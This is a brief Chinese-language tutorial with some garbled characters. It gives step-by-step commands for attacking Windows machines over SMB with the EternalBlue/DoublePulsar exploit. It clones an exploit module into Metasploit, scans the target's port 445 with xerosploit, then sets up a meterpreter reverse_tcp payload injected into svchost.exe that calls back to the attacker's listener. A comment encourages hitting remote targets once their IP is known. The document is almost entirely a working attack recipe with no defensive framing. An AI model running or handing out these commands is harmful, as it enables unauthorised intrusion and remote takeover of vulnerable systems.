參考:
https://www.youtube.com/watch?v=goUVgchVGB0
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
https://github.com/LionSec/xerosploit(沒(méi)有xerosploit可以通過(guò)這里獲取)
更多詳細(xì)內(nèi)容:http://www.itdecent.cn/p/a34a3d560ffd
cd /tmp
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
mv eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
xerosploit
scan
目標(biāo)IP
pscan
run
#確認(rèn)一下目標(biāo)的445端口是open的
#可以使用其他工具做探測(cè),也可以對(duì)遠(yuǎn)程目標(biāo)打擊,只要獲取目標(biāo)IP就好
msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
set rhost 目標(biāo)IP
set PROCESSINJECT svchost.exe
set payload windows/meterpreter/reverse_tcp
set lhost 監(jiān)聽(tīng)者IP
exploit